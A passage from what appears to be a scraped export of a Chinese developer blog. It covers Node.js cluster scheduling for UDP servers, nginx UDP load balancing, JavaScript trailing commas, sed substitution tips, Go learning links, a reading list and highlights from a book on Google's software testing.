{\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601201509,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: adf\\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202172,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: asdflasdf\\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202382,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202545,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202678,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202832,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203332,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203420,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203500,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203609,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203669,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203752,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203836,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203920,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204004,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204089,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204172,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204256,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204340,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204423,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204507,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204590,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204674,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204759,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204842,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204926,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601205010,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601205093,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} 为什么会这样?看看cluster模块的代码 lib/cluster.js lib/cluster.js cluster除去注释,代码仅有两行 \u0026#39;use strict\u0026#39;; // 根据环境变量中是否有NODE_UNIQUE_ID来判断当前进程是主进程还是子进程 const childOrPrimary = \u0026#39;NODE_UNIQUE_ID\u0026#39; in process.env ? \u0026#39;child\u0026#39; : \u0026#39;primary\u0026#39;; // 根据进程类型不同,加载的文件也不同 // 对于主进程,则加载 internal/cluster/primary // 对于自进程,则加载 internal/cluster/child module.exports = require(`internal/cluster/${childOrPrimary}`); internal/cluster/primary.js 轮询策略的种类 通过阅读源码,我们可以获取到以下结论:\ncluster模块实际上是一个事件发射器 cluster模块有两种负载均衡方式 SCHED_NONE 由操作系统决定 SCHED_RR 轮询的方式 const { ArrayPrototypePush, ArrayPrototypeSlice, ArrayPrototypeSome, ObjectKeys, ObjectValues, RegExpPrototypeTest, SafeMap, StringPrototypeStartsWith, } = primordials; const assert = require(\u0026#39;internal/assert\u0026#39;); const { fork } = require(\u0026#39;child_process\u0026#39;); const path = require(\u0026#39;path\u0026#39;); const EventEmitter = require(\u0026#39;events\u0026#39;); const RoundRobinHandle = require(\u0026#39;internal/cluster/round_robin_handle\u0026#39;); const SharedHandle = require(\u0026#39;internal/cluster/shared_handle\u0026#39;); const Worker = require(\u0026#39;internal/cluster/worker\u0026#39;); const { internal, sendHelper } = require(\u0026#39;internal/cluster/utils\u0026#39;); const cluster = new EventEmitter(); const intercom = new EventEmitter(); const SCHED_NONE = 1; const SCHED_RR = 2; const minPort = 1024; const maxPort = 65535; const { validatePort } = require(\u0026#39;internal/validators\u0026#39;); module.exports = cluster; const handles = new SafeMap(); cluster.isWorker = false; cluster.isMaster = true; // Deprecated alias. Must be same as isPrimary. cluster.isPrimary = true; cluster.Worker = Worker; cluster.workers = {}; cluster.settings = {}; cluster.SCHED_NONE = SCHED_NONE; // Leave it to the operating system. cluster.SCHED_RR = SCHED_RR; // Primary distributes connections. 轮询策略如何选择 接下来,我们就要再看看,两种不同的负载策略是如何选择的?\n负载策略刚开始来自NODE_CLUSTER_SCHED_POLICY这个环境变量 这个环境变量有两个值 rr和none 但是如果系统平台是win32, 也就是windows的情况下,则不会使用轮训的负载方式 除此以外,默认将会使用轮训的负载方式 // XXX(bnoordhuis) Fold cluster.schedulingPolicy into cluster.settings? let schedulingPolicy = process.env.NODE_CLUSTER_SCHED_POLICY; if (schedulingPolicy === \u0026#39;rr\u0026#39;) schedulingPolicy = SCHED_RR; else if (schedulingPolicy === \u0026#39;none\u0026#39;) schedulingPolicy = SCHED_NONE; else if (process.platform === \u0026#39;win32\u0026#39;) { // Round-robin doesn\u0026#39;t perform well on // Windows due to the way IOCP is wired up. schedulingPolicy = SCHED_NONE; } else schedulingPolicy = SCHED_RR; cluster.schedulingPolicy = schedulingPolicy; 那么,为什么udp的多进程服务器,并没有做到轮询的负载呢?\n轮询策略的使用 即使调用策略是轮询的方式,如果socker是udp的,也不会用轮训的方式去处理,而用SharedHandle去处理 注释里面写,udp使用轮询的方式是无意义的,这点我不太理解 // UDP is exempt from round-robin connection balancing for what should // be obvious reasons: it\u0026#39;s connectionless. There is nothing to send to // the workers except raw datagrams and that\u0026#39;s pointless. if (schedulingPolicy !== SCHED_RR || message.addressType === \u0026#39;udp4\u0026#39; || message.addressType === \u0026#39;udp6\u0026#39;) { handle = new SharedHandle(key, address, message); } else { handle = new RoundRobinHandle(key, address, message); } ","permalink":"https://wdd.js.org/posts/2021/07/tniabf/","summary":"本来我的目的是使用cluster模块的fork出多个进程,让各个进程都能处理udp消息的。但是最终测试发现,实际上仅有一个进程处理了绝大数消息,其他的进程,要么不处理消息,要么处理的非常少的消息。\n然而使用cluster来开启http服务的多进程,却能够达到多进程的负载。\nserver端demo代码: const cluster = require(\u0026#39;cluster\u0026#39;) const numCPUs = require(\u0026#39;os\u0026#39;).cpus().length const { logger } = require(\u0026#39;./logger\u0026#39;) const dgram = require(\u0026#39;dgram\u0026#39;) // const { createHTTPServer, createUDPServer } = require(\u0026#39;./app\u0026#39;) const port = 8088 if (cluster.isMaster) { for (let i = 0; i \u0026lt; numCPUs; i++) { cluster.fork() } cluster.on(\u0026#39;exit\u0026#39;, (worker, code, signal) =\u0026gt; { logger.info(`工作进程 ${worker.process.pid} 已退出`) }) } else { const server = dgram.createSocket({ type: \u0026#39;udp4\u0026#39;, reuseAddr: true }) server.","title":"udp cluster 多进程调度策略学习"},{"content":"在线书籍 《Go语言原本》https://golang.design/under-the-hood/ 《Golang修养之路》https://www.kancloud.cn/aceld/golang 《Go语言高性能编程》https://geektutu.com/post/high-performance-go.html 《7天用Go从零实现Web框架Gee教程》https://geektutu.com/post/gee.html 博客关注 https://carlosbecker.com/ https://www.alexedwards.net/blog https://gobyexample.com/ 文章收藏 https://carlosbecker.com/posts/env-structs-golang https://www.alexedwards.net/blog/json-surprises-and-gotchas https://www.alexedwards.net/blog/how-to-manage-database-timeouts-and-cancellations-in-go https://www.alexedwards.net/blog/custom-command-line-flags https://www.alexedwards.net/blog/how-to-properly-parse-a-json-request-body https://www.alexedwards.net/blog/working-with-redis https://www.alexedwards.net/blog/organising-database-access https://www.alexedwards.net/blog/interfaces-explained ","permalink":"https://wdd.js.org/golang/learn-material/","summary":"在线书籍 《Go语言原本》https://golang.design/under-the-hood/ 《Golang修养之路》https://www.kancloud.cn/aceld/golang 《Go语言高性能编程》https://geektutu.com/post/high-performance-go.html 《7天用Go从零实现Web框架Gee教程》https://geektutu.com/post/gee.html 博客关注 https://carlosbecker.com/ https://www.alexedwards.net/blog https://gobyexample.com/ 文章收藏 https://carlosbecker.com/posts/env-structs-golang https://www.alexedwards.net/blog/json-surprises-and-gotchas https://www.alexedwards.net/blog/how-to-manage-database-timeouts-and-cancellations-in-go https://www.alexedwards.net/blog/custom-command-line-flags https://www.alexedwards.net/blog/how-to-properly-parse-a-json-request-body https://www.alexedwards.net/blog/working-with-redis https://www.alexedwards.net/blog/organising-database-access https://www.alexedwards.net/blog/interfaces-explained ","title":"Golang学习资料"},{"content":"对nginx的最低版本要求是? 1.9.13 The ngx_stream_proxy_module module (1.9.0) allows proxying data streams over TCP, UDP (1.9.13), and UNIX-domain sockets.\n简单的配置是什么样? 例如监听本地53的udp端口,然后转发到192.168.136.130和192.168.136.131的53端口\n注意事项\nstream是顶层的配置,不能包含在http模块里面 proxy_responses很重要,如果你的udp服务只接受udp消息,并不发送udp消息,那么务必将proxy_responses的值设置为0 stream { upstream dns_upstreams { server 192.168.136.130:53; server 192.168.136.131:53; } server { listen 53 udp; proxy_pass dns_upstreams; proxy_timeout 1s; proxy_responses 0; error_log logs/dns.log; } } | Syntax: | proxy_responses number;\nDefault: — Context: stream, server |\nThis directive appeared in version 1.9.13.\nSets the number of datagrams expected from the proxied server in response to a client datagram if the UDP protocol is used. The number serves as a hint for session termination. By default, the number of datagrams is not limited. If zero value is specified, no response is expected. However, if a response is received and the session is still not finished, the response will be handled.\n我能用HAProxy吗? 答: HAProxy不支持udp Proxy,你不能用\nHAProxy is a free, very fast and reliable solution offering high availability, load balancing, and proxying for TCP and HTTP-based applications\n参考 http://nginx.org/en/docs/stream/ngx_stream_proxy_module.html#proxy_responses https://stackoverflow.com/questions/31255780/udp-traffic-with-iperf-for-haproxy ","permalink":"https://wdd.js.org/posts/2021/07/tom7mv/","summary":"对nginx的最低版本要求是? 1.9.13 The ngx_stream_proxy_module module (1.9.0) allows proxying data streams over TCP, UDP (1.9.13), and UNIX-domain sockets.\n简单的配置是什么样? 例如监听本地53的udp端口,然后转发到192.168.136.130和192.168.136.131的53端口\n注意事项\nstream是顶层的配置,不能包含在http模块里面 proxy_responses很重要,如果你的udp服务只接受udp消息,并不发送udp消息,那么务必将proxy_responses的值设置为0 stream { upstream dns_upstreams { server 192.168.136.130:53; server 192.168.136.131:53; } server { listen 53 udp; proxy_pass dns_upstreams; proxy_timeout 1s; proxy_responses 0; error_log logs/dns.log; } } | Syntax: | proxy_responses number;\nDefault: — Context: stream, server |\nThis directive appeared in version 1.9.13.\nSets the number of datagrams expected from the proxied server in response to a client datagram if the UDP protocol is used.","title":"使用nginx为udp服务负载均衡"},{"content":"简介 看下面的代码,如果我们要新增加一行\u0026quot;ccc\u0026quot;, 实际我们的目的是增加一行,但是对于像git这种版本控制系统来说,我们改动了两行。\n第三行进行了修改 第四行增加了 我们为什么要改动两行呢?因为如果不在第三行上的末尾加上逗号就增加第四行,则会报错语法错误。\nvar names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34; ] var names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34; ] 尾逗号的提案就是允许再一些场景下,允许再尾部增加逗号。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, ] 那么我们再新增加一行的情况下,则只需要增加一行,而不需要修改之前行的代码。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34;, ] 兼容性 除了IE浏览器没有对尾逗号全面支持以外,其他浏览器以及Node环境都已经全满支持 JSON是不支持尾逗号的,尾逗号只能在代码里面用 注意在包含尾逗号时数组长度的计算 [,,,].length // 3 [,,,1].length // 4 [,,,1,].length // 4 [1,,,].lenght // 3 使用场景 数组中使用 var abc = [ 1, 2, 3, ] 对象字面量中使用 var info = { name: \u0026#34;li\u0026#34;, age: 12, } 作为形参使用 function say ( name, age, ) { } 作为实参使用 say( \u0026#34;li\u0026#34;, 12, ) 在import中使用 import { A, B, C, } from \u0026#39;D\u0026#39; 参考 https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Trailing_commas ","permalink":"https://wdd.js.org/fe/js-trailing-commas/","summary":"简介 看下面的代码,如果我们要新增加一行\u0026quot;ccc\u0026quot;, 实际我们的目的是增加一行,但是对于像git这种版本控制系统来说,我们改动了两行。\n第三行进行了修改 第四行增加了 我们为什么要改动两行呢?因为如果不在第三行上的末尾加上逗号就增加第四行,则会报错语法错误。\nvar names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34; ] var names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34; ] 尾逗号的提案就是允许再一些场景下,允许再尾部增加逗号。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, ] 那么我们再新增加一行的情况下,则只需要增加一行,而不需要修改之前行的代码。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34;, ] 兼容性 除了IE浏览器没有对尾逗号全面支持以外,其他浏览器以及Node环境都已经全满支持 JSON是不支持尾逗号的,尾逗号只能在代码里面用 注意在包含尾逗号时数组长度的计算 [,,,].length // 3 [,,,1].length // 4 [,,,1,].length // 4 [1,,,].lenght // 3 使用场景 数组中使用 var abc = [ 1, 2, 3, ] 对象字面量中使用 var info = { name: \u0026#34;li\u0026#34;, age: 12, } 作为形参使用 function say ( name, age, ) { } 作为实参使用 say( \u0026#34;li\u0026#34;, 12, ) 在import中使用 import { A, B, C, } from \u0026#39;D\u0026#39; 参考 https://developer.","title":"Js Trailing Commas"},{"content":"6月书单回顾 《鳗鱼的旅行》刚读到92% 《Googler软件测试之道》100% 《软件测试之道微软技术专家经验总结》24% 《沉默的病人》100% 《一个人的朝圣》9% 《读懂发票》100% 《108个训练让你成为手机摄影达人》100% 《经济学通识课》5% 《楚留香新传》100% 7月书单 《鳗鱼的旅行》 《软件测试之道微软技术专家经验总结》 [KU]《一个人的朝圣》 [KU]《经济学通识课》 new 水浒传 [KU] new 围城 [KU] new 黄金时代 new 长安十二时辰 [KU] new 幻夜 new 软件开发本质论 [KU] new 苏东坡传 [KU] new 诡计博物馆 [KU] new 大师的盛宴 二十世纪最佳科幻小说 [KU] new 活出生命的意义 ","permalink":"https://wdd.js.org/posts/2021/07/ou9o92/","summary":"6月书单回顾 《鳗鱼的旅行》刚读到92% 《Googler软件测试之道》100% 《软件测试之道微软技术专家经验总结》24% 《沉默的病人》100% 《一个人的朝圣》9% 《读懂发票》100% 《108个训练让你成为手机摄影达人》100% 《经济学通识课》5% 《楚留香新传》100% 7月书单 《鳗鱼的旅行》 《软件测试之道微软技术专家经验总结》 [KU]《一个人的朝圣》 [KU]《经济学通识课》 new 水浒传 [KU] new 围城 [KU] new 黄金时代 new 长安十二时辰 [KU] new 幻夜 new 软件开发本质论 [KU] new 苏东坡传 [KU] new 诡计博物馆 [KU] new 大师的盛宴 二十世纪最佳科幻小说 [KU] new 活出生命的意义 ","title":"7月书单"},{"content":"直接在原文的基础上修改 sed -i \u0026#39;s/ABC/abc/g\u0026#39; some.txt 多次替换 方案 1 使用分号 sed \u0026#39;s/ABC/abc/g;s/DEF/def/g\u0026#39; some.txt 方案 2 多次使用-e sed -e \u0026#39;s/ABC/abc/g\u0026#39; -e \u0026#39;s/DEF/def/g\u0026#39; some.txt 转译/ 如果替换或者被替换的字符中本来就有/, 那么替换就会无法达到预期效果,那么我们可以用其他的字符来替代/。\nThe / characters may be uniformly replaced by any other single character within any given s command. The / character (or whatever other character is used in its stead) can appear in the regexp or replacement only if it is preceded by a \\ character. https://www.gnu.org/software/sed/manual/sed.html\n# 可以用#来替代/ sed \u0026#39;s#ABC#de/#g\u0026#39; some.txt # 也可以用?来替代/ sed \u0026#39;s?ABC?de#?g\u0026#39; some.txt 替代的目标中包含变量 # 注意这里用的是双引号,内部的变量会被转义 sed \u0026#34;s#ABC#${TODAY}#g\u0026#34; some.txt 参考 https://www.gnu.org/software/sed/manual/sed.html ","permalink":"https://wdd.js.org/shell/sed-tips/","summary":"直接在原文的基础上修改 sed -i \u0026#39;s/ABC/abc/g\u0026#39; some.txt 多次替换 方案 1 使用分号 sed \u0026#39;s/ABC/abc/g;s/DEF/def/g\u0026#39; some.txt 方案 2 多次使用-e sed -e \u0026#39;s/ABC/abc/g\u0026#39; -e \u0026#39;s/DEF/def/g\u0026#39; some.txt 转译/ 如果替换或者被替换的字符中本来就有/, 那么替换就会无法达到预期效果,那么我们可以用其他的字符来替代/。\nThe / characters may be uniformly replaced by any other single character within any given s command. The / character (or whatever other character is used in its stead) can appear in the regexp or replacement only if it is preceded by a \\ character. https://www.gnu.org/software/sed/manual/sed.html","title":"sed替换"},{"content":"Google软件测试之道(异步图书)James Whittaker; Jason Arbon; Jeff Carollo\n序标注(黄色) - 位置 361从根本上说,如果测试人员想加入这个俱乐部,就必须具备良好的计算机科学基础和编程能力。变革标注(黄色) - 位置 367招聘具备开发能力的测试人员很难,找到懂测试的开发人员就更难,标注(黄色) - 位置 368但是维持现状更要命,我只能往前走。标注(黄色) - 位置 388我们寻找的人要兼具开发人员的技能和测试人员的思维,他们必须会编程,能实现工具、平台和测试自动化。第1章 Google软件测试介绍标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 573Google能用如此少的专职测试人员的原因,就是开发对质量的负责。标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 574如果某个产品出了问题,第一个跳出来的肯定是导致这个问题发生的开发人员,而不是遗漏这个 bug的测试人员。标注(黄色) - 1.2.1 软件开发工程师(SWE) \u0026gt; 位置 593软件开发工程师(标注(黄色) - 1.2.2 软件测试开发工程师(SET) \u0026gt; 位置 600软件测试开发工程师(标注(黄色) - 1.2.3 测试工程师(TE) \u0026gt; 位置 612TE把用户放在第一位来思考。 TE组织整体质量实践,分析解释测试运行结果,第2章 软件测试开发工程师书签 - 位置 784标注(黄色) - 位置 787Google的 SWE是功能开发人员; Google的 SET是测试开发人员; Google的 TE是用户开发人员。标注(黄色) - 2.1.1 开发和测试流程 \u0026gt; 位置 864测试驱动开发”标注(黄色) - 2.1.3 项目的早期阶段 \u0026gt; 位置 908一个产品如果在概念上还没有完全确定成型时就去关心质量,这就是优先级混乱的表现。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1398每个测试和其他测试之间都是独立的,使它们就能够以任意顺序来执行。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1399测试不做任何数据持久化方面的工作。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1400在这些测试用例离开测试环境的时候,要保证测试环境的状态与测试用例开始执行之前的状态是一样的。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1404总之,“任意顺序”意味着可以并发执行用例。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1650在一些棘手的编码问题或功能的正确性上浪费时间,不如考核他们是如何看待编码和质量的。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1727测试不应是被要求了才去做的事情。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1728程序的稳定性和韧性比功能正确要重要的多。标注(黄色) - 2.4 与工具开发工程师Ted Mao的访谈 \u0026gt; 位置 1796要允许他们使用你无法预料的方式来使用你的工具。标注(黄色) - 2.5 与Web Driver的创建者Simon Stewart的对话 \u0026gt; 位置 1845我使用了一个被称为 DDD(译注: defect-driven development)的流程,缺陷驱动开发。标注(黄色) - 2.5 与Web Driver的创建者Simon Stewart的对话 \u0026gt; 位置 1859Chrome在使用 PyAuto,第3章 测试工程师标注(黄色) - 3.1 一种面向用户的测试角色 \u0026gt; 位置 1879我们说 TE是一种“用户开发者( user-developer)”,这不是一个容易理解的概念。标注(黄色) - 3.1 一种面向用户的测试角色 \u0026gt; 位置 1880对于编码的敬意是公司文化中相当重要的一点。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1903在研发的早期阶段,功能还在不断变化,最终功能列表和范畴还没有确定, TE通常没有太多的工作可做。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1904给一个项目配备多少测试人员,取决于项目风险和投资回报率。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1906我们需要在正确的时间,投入正确数量的 TE,并带来足够的价值。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1908当前软件的薄弱点在哪里?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1909有没有安全、隐私、性能、可靠性、可用性、标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1910主要用户场景是否功能正常?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1911当发生问题的时候,是否容易诊断问题所在?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1914TE的根本使命是保护用户和业务的利益,使之不受到糟糕的设计、令人困惑的用户体验、标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1921TE擅长发现需求中的模糊之处,标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1924TE通常是团队里最出名的人,因为他们需要与各种角色标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1938下面是我们关于 TE职责的一般性描述。测试计划和风险分析。评审需求、设计、代码和测试。探索式测试。用户场景。编写测试用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1949如果软件深受人们喜爱,大家就会认为测试所作所为是理所应当的;如果软件很糟糕,人们可能就会质疑测试工作。笔记 - 3.2.1 测试计划 \u0026gt; 位置 1950测试背锅标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1990读者可以用“ Google Test Analytics”关键词搜索到这个工具。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1991避免散漫的文字,推荐使用简明的列表。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1993不必推销。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1995简洁。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1996不要把不重要的、无法执行的东西放进测试标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1998渐进式的描述( Make it flow)。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2001最终结果应该是测试用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20091. A代表特质( Attribute)标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2010在开始测试计划或做 ACC分析的时候,必须先确定该产品对用户、对业务的意义。我们为什么要开发这个东西呢?它能带来什么核心价值?它又靠什么来吸引用户?记住,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20462. C代表组件( component)组件是系统的名词,在特质被识别之后确定。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2049组件是构成待建系统的模块,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20633. C代表能力( capability)能力是系统的动词,代表着系统在用户指令之下完成的动作。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2095能力最重要的一个特点是它的可测试性。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2098能力最重要的一个特点是它的可测试性。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2100一个能力可以描述任意数量的用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2130用一系列能力来描述用户故事,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2142确定 Google +的特质、组件和能力。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2193风险无处不在——标注(黄色) - 3.2.2 风险 \u0026gt; 